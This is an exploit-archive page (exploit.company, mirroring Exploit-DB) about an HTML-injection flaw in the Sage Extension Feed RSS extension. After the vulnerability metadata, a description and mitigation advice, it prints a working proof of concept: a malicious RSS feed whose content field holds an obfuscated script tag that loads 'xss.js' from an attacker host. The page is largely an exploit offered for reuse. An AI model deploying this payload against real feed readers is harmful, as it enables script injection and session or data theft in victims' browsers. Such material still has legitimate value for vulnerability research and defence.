Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Sage Extension Feed HTML-injection vulnerability - exploit.company
header-logo
Suggest Exploit
vendor:
Sage Extension Feed
by:
Unknown
5.5
CVSS
MEDIUM
HTML-injection
79
CWE
Product Name: Sage Extension Feed
Affected Version From: 1.3.2009
Affected Version To: 1.3.2009
Patch Exists: NO
Related CWE:
CPE: a:sage_extension_feed:1.3.9
Metasploit:
Other Scripts:
Platforms Tested:
2007

Sage Extension Feed HTML-injection vulnerability

The Sage Extension Feed application fails to properly sanitize user-supplied input before using it in dynamically generated content, leading to an HTML-injection vulnerability. Hostile HTML and script code can be injected into vulnerable sections of the application, which can be rendered in the browser of a user viewing a malicious RSS feed.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user-supplied input before using it in dynamically generated content. Additionally, users should be cautious when viewing RSS feeds from untrusted sources.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/22493/info

Sage Extension Feed is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.

Hostile HTML and script code may be injected into vulnerable sections of the application. When viewed, this code may be rendered in the browser of a user viewing a malicious RSS feed.

Sage Extension Feed 1.3.9 is vulnerable to this issue; prior versions may also be affected. 

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/"
xmlns:dc="http://purl.org/dc/elements/1.1/"


<channel>
<title>test</title>
<link>http://www.example.com/</link>
<description>test</description>
<item>
<title>test</title>
<content:encoded><![CDATA[
<SCRIPT/=''SRC='http://atackersite/xss.js'></SCRIPT>
]]>
</content:encoded>
</item>
</channel>
</rss>